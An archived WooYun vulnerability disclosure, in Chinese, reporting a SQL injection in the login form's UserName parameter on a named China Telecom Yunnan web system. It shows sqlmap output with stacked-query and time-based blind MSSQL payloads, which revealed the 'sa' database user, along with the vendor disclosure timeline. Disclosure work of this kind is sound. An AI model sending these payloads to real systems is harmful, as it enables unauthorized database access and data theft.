乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-18: 细节已通知厂商并且等待厂商处理中 2014-10-23: 厂商已经确认,细节仅向厂商公开 2014-11-02: 细节向核心白帽子及相关领域专家公开 2014-11-12: 细节向普通白帽子公开 2014-11-22: 细节向实习白帽子公开 2014-12-02: 细节向公众公开
抽个空赚点分
http://3gdr.yn.189.cn/ 3G达人业务管理系统“登录处post注射” UserName参数存在注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: UserName Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwULLTE2Mzc1MTQxNTUPZBYCAgMPZBYCAgUPFCsAAmQQFgAWABYAZGT/Hssv8/3NuZE4GPO76VAmRg69a5OXCF4DVfby33snrA==&__EVENTTARGET=ImageMap1&__EVENTARGUMENT=0&__EVENTVALIDATION=/wEWBgKR4fibCgKvruq2CAKyxeCRDwLA14awAgLf14awAgKdn+0nIZ54IPelK579RLcQVn0mXxnRRWyQmP51F0g6+Gmu+DU=&UserName=s'; WAITFOR DELAY '0:0:5'--&PassWord=a&CheckFlag=0 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwULLTE2Mzc1MTQxNTUPZBYCAgMPZBYCAgUPFCsAAmQQFgAWABYAZGT/Hssv8/3NuZE4GPO76VAmRg69a5OXCF4DVfby33snrA==&__EVENTTARGET=ImageMap1&__EVENTARGUMENT=0&__EVENTVALIDATION=/wEWBgKR4fibCgKvruq2CAKyxeCRDwLA14awAgLf14awAgKdn+0nIZ54IPelK579RLcQVn0mXxnRRWyQmP51F0g6+Gmu+DU=&UserName=s' WAITFOR DELAY '0:0:5'--&PassWord=a&CheckFlag=0---[11:48:53] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128back-end DBMS: Microsoft SQL Server 2008[11:48:53] [INFO] fetching current user[11:48:53] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n][11:49:11] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[11:49:21] [INFO] adjusting time delay to 1 second due to good response timessacurrent user: 'sa'[11:49:28] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 31 times[11:49:28] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\3gdr.yn.189.cn'[*] shutting down at 11:49:28
给个12分把
危害等级:高
漏洞Rank:11
确认时间:2014-10-23 08:40
暂无